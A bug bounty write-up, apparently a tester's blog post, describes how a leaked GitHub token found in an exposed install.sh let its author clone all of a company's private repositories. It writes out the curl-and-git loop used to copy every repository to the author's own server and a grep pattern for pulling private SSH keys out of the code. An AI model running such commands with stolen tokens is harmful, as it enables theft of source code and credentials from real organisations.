Full structure takeover to many brands of company

Notic: this private program is hosted on bugcrowd platform and have many brands

While testing this program I made a brute-force directories and found this directory listing http://sub.target.com/scripts

While analysing this files I have found interested token in [install.sh] file

This is Github access token, [d42e9078e94930************] , but first I want to verify this token valid or expired , because when developer create this token can choose time to expired it automatically like this ..

Lets try to verify


You should request like this URL by browser or curl, and then matches the response repositories or it was expired ..

Amazing!! I can list private clone repositories, But I can’t report it without make sure that data related to company or not, because maybe this developer just work part-time in company, so I will clone private repositories and analysis it, lets goo

curl https://api.github.com/orgs/<username>/repos?access_token=<token> | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txtfor repo in $(cat privare_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done

This bash code to clone all private repositories at my VPS and then go to analysis it

I have found 5.4G size of repositories OMG..

I can’t analysis this size of data in short time, so I will use grep command to get sensitive data

# Grep private ssh key command
grep -r -R '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))'

This regex to extract private ssh key from all repositories , very nice

This file I have found many of creds and I have found many of docker connections but I cant make this because its out of scope from program, because the program say that not to try connect databases or internal structure

But I have larger than 15 private repository related to 15 brand :)

I found at every repo [ panel passwords , backup databases , full application code , cloud creds] and I can connect and takeover all brands

Also Business impact

I reached to all [product architecture , products layout] but sorry I cant share this, to preserve the confidentiality of company data

Keep following

Linkedin | Facebook

I will publish some juicy writeups soon ..

Penetration tester | Bug Hunter